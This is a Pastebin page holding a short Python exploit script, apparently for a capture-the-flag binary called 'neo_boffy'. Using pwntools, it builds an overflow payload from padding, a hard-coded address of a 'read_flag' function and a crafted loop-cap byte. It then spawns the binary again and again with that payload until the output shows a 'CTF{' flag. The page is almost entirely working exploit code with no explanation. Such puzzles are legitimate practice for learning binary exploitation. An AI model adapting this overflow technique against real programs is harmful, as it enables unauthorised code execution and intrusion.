Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- bin_path = "./neo_boffy"
- # Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
- context(log_level="ERROR")
- # Can't send NULLs, but can send empty strings
- def cmdify(str): return str.split("\x00")
- read_flag_offset = 0x8d0
- read_flag = 0x565ee000 + read_flag_offset # Hard code since there is no aslr leak
- loop_cap = 0x78 # This is where the loop caps
- payload = ""
- payload += "\x00" * 3 # ensure we can keep looping
- payload += p32(read_flag)
- payload += chr(loop_cap - 1 - len(payload))
- payload = payload.rjust(0x79, "A")
- # Keep trying until we find it
- while True:
- p = process([bin_path] + cmdify(payload))
- out = p.recvall()
- if "CTF{" in out:
- print(out)
- break
Add Comment
Please, Sign In to add comment